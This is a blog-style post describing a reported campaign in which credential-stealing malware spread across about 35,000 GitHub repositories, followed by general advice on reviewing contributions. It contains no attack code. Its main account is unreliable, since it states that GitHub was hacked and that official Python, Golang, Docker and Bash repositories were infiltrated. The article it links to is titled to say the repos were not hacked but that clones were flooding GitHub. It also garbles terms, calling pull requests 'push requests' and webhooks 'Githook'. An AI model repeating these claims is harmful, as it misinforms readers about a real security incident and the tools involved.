GitHACK! We are the vulnerability

Github being hacked? To most that doesn’t sound too unreasonable as major tech companies and minor ones have been hacked before. However, this doesn’t mean the likely hood of Github being hacked is high. Why is that? Github is the main open code repository for all in the IT industry.

Regardless of sub-sector. Even if someone does Embedded systems, Web3 development, Web2 development, Data science etc most would use Github to store their code. It is because of this that Github’s security has always been so extremely high. Not just because they wanted to be trusted by their users but also because the code on their users’ Github repositories is filled with crypto private keys, API private keys, financial credentials and even proprietary software of multiple companies across the IT industry globally. It is for this reason that Github has always been hard-handed with its security and user accessibility, that is why their hacking, although not completely surprising, is very startling and worrying.

Context of the Githack:

What type of hack attack was it? It is a malware attack. So not a traditional DDoS or forced penetration attack one would have expected, but potentially more lethal. The hacker/hackers uploaded a widespread piece of Malware to different repositories across the platform.

What does the Malware do? it copies any financial information, authentication information and private crypto keys, essentially the ENV of the script. Then when accepted into the repository and ran locally on the then affected computers, it will copy and send the information to the attacker. So not a hack in a traditional sense but definitely a hack as information was still extracted through non-consensual data breach means.

What is the breadth of the hack attack? this particular attempted hack has reached no more and no less than 35,000 Github repositories. It has infiltrated repositories such as the python repo, golang repo, docker repo and bash repo. Some of the repositories affected were even archived and unused. Some were even seen with the malware inside of them from as far back as 2015. This indicates that the hack was a well-documented and planned one.

How does it infiltrate the Github repositories? It is added to the Github repositories through a commit and in the commit through npm scripts or different docker image classifications. So you would, mainly, only be vulnerable if your project utilized javascript in some way or docker. Then if the commit is accepted and is cloned and used in the main repository, the users who cloned it will be affected.

How to prevent this?

As I type about this incident all parties involved in the cleanup, the repository owners and Github, are already in the process of damage control and making sure this doesn’t happen again. We can only speculate and wonder as to what the different security techniques and defenses Github will use to protect themselves from future attacks. As such we must focus on us as individuals or groups. What can we do in our own capacity to stop future data theft like this?

• Don’t accept push requests from random people to your repository. I know this might be harder for most large open source projects. However, be cautious when accepting push requests, Especially if the push requests edit the environmental variables of your application.

• Always check what exactly you are cloning from a git repository. I know most of us actively don’t do this. Simply because repositories contain so many files and folders that keeping track of them and analyzing them one by one will be tiring. So it would be wise to check the most important files such as the readme and .env files.

• Use security testing in push requests. Github actually has a security framework, driven by Githook, that allows you to send HTTP post requests when certain events are met during the push request. There are different technologies that can analyze your push or pull request for security vulnerabilities, common viruses and other types of security breaches in your code.

Overall let this be a lesson to us all. The attacks that nefarious organizations/people may do are not just rudimentary but also advanced and very unconditional as well as long-term planned. As developers we need to be more aware of the vulnerabilities of our code, repositories, computers and even ourselves and that if someone wants information they can find very different ways to get it. Even if the internet should be safe, doesn’t mean it is. It is up to everyone to do their part to make your own data safe, and if you can, find ways to help others keep their data safe.

For a further reading on the situation go here: https://www.bleepingcomputer.com/news/security/35-000-code-repos-not-hacked-but-clones-flood-github-to-serve-malware/